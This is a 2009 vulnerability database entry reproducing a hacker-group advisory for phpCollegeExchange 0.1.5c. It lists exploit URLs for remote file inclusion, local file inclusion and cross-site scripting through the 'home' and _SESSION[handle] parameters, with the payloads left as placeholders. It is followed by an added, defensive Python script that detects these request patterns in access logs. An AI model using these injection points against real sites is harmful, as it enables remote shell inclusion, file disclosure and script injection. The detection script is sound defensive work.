phpCollegeExchange 0.1.5c (RFI/LFI/XSS) Multiple Vulnerabilities

2009-06-24T00:00:00
ID SSV:11695
Type seebug
Reporter Root
Modified 2009-06-24T00:00:00

Description

No description provided by source.

                                        
                                            
┌┌─────────────────────────────────────────────────────────────────────────────────┐
││                                C r a C k E r                                   ┌┘
┌┘             T H E   C R A C K   O F   E T E R N A L   M I G H T                ││
└─────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────         From The Ashes and Dust Rises An Unimaginable crack....         ────┐
┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘         [ Remote File Include ]     [ Local File Include ]     [ XSS ]         ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
:   Author   : CraCkEr                   : :                                       :
│   Script   : phpCollegeExchange 0.1.5c │ │          Register Globals :           │
│   Download : sourceforge.net           │ │                                       │
│   Method   : GET                       │ │           [█] ON   [ ] OFF            │
│   Critical : High [░░▒▒▓▓██]           │ │                                       │
│   Impact   : system information        │ │                                       │
│ ───────────────────────────────────────┘ └────────────────────────────────────── │
│                                 DALnet #crackers                                ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                  :
│  Release Notes:                                                                  │
│  ═════════════                                                                   │
│  Typically used for remotely exploitable vulnerabilities that can lead to        │
│  system compromise.                                                              │
│                                                                                  │

┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘                                Exploit URLs                                    ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘

[RFI]

http://localhost/path/i_head.php?home=[SHELL]
http://localhost/path/i_nav.php?home=[SHELL]
http://localhost/path/user_new_2.php?home=[SHELL]
http://localhost/path/books/allbooks.php?home=[SHELL]
http://localhost/path/books/home.php?home=[SHELL]
http://localhost/path/books/mybooks.php?home=[SHELL]


[LFI]

http://localhost/path/house/myrents.php?home=[LFI]


[XSS]

http://localhost/php pages/home.php?_SESSION[handle]=[XSS]
http://localhost/path/i_head.php?home=[XSS]
http://localhost/path/i_nav.php?home=[XSS]
http://localhost/path/books/allbooks.php?home=[XSS]
http://localhost/path/books/allbooks.php?_SESSION[handle]=[XSS]
http://localhost/path/books/home.php?home=[XSS]
http://localhost/path/books/home.php?_SESSION[handle]=[XSS]
http://localhost/path/books/i_nav.php?home=[XSS]


   
└──────────────────────────────────────────────────────────────────────────────────┘
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL, rd0 .

┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘                                 © CraCkEr 2009                                 ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
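
Added example, not part of the original advisory: a triage script for web-server access logs that flags the request shapes listed above, namely a `home` value carrying a URL scheme or a filesystem path on the listed scripts, and request keys that name a PHP superglobal such as `_SESSION[handle]`. The combined-log request format, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script names the advisory lists as taking a caller-supplied `home` parameter.
LISTED = {"i_head.php", "i_nav.php", "user_new_2.php", "allbooks.php",
          "home.php", "mybooks.php", "myrents.php"}
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SCHEME = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.I)   # http://, ftp://, php://
SUPERGLOBAL = re.compile(r"^(_SESSION|_SERVER|_ENV|_FILES|_COOKIE|GLOBALS)(\[|$)")
MARKUP = re.compile(r"[<>\"']")

def classify(line):
    """Return the sorted findings for one access-log line ([] if clean)."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    findings = set()
    # parse_qsl percent-decodes keys and values, so encoded variants match too.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        if SUPERGLOBAL.match(key):
            # Request key naming a PHP superglobal, as in the _SESSION[handle] URLs.
            findings.add("superglobal-in-request")
            if MARKUP.search(value):
                findings.add("markup-in-value")
        if key == "home" and script in LISTED:
            if SCHEME.match(value):
                findings.add("home-remote-url")
            elif ".." in value or "\x00" in value or value.startswith("/"):
                findings.add("home-local-path")
            if MARKUP.search(value):
                findings.add("markup-in-value")
    return sorted(findings)

# Constructed sample lines (documentation-range addresses, harmless values).
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Jun/2009:10:00:01 +0000] "GET /path/i_head.php?home=http%3A%2F%2F203.0.113.5%2Fa.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [24/Jun/2009:10:00:05 +0000] "GET /path/house/myrents.php?home=..%2F..%2Fsome%2Ffile HTTP/1.1" 200 300',
    '198.51.100.9 - - [24/Jun/2009:10:01:00 +0000] "GET /path/books/home.php?_SESSION%5Bhandle%5D=%3Cb%3Ex%3C%2Fb%3E HTTP/1.1" 200 900',
    '192.0.2.10 - - [24/Jun/2009:10:02:00 +0000] "GET /path/books/allbooks.php HTTP/1.1" 200 4100',
]

def scan(lines):
    """Map line index -> findings for every line that has at least one."""
    return {i: f for i, f in enumerate(map(classify, lines)) if f}

if __name__ == "__main__":
    for idx, found in scan(SAMPLE_LOG).items():
        print(idx, found)
```

Any hit on a host still running this script version with register_globals enabled warrants review of the request's response size and of files written around the same time.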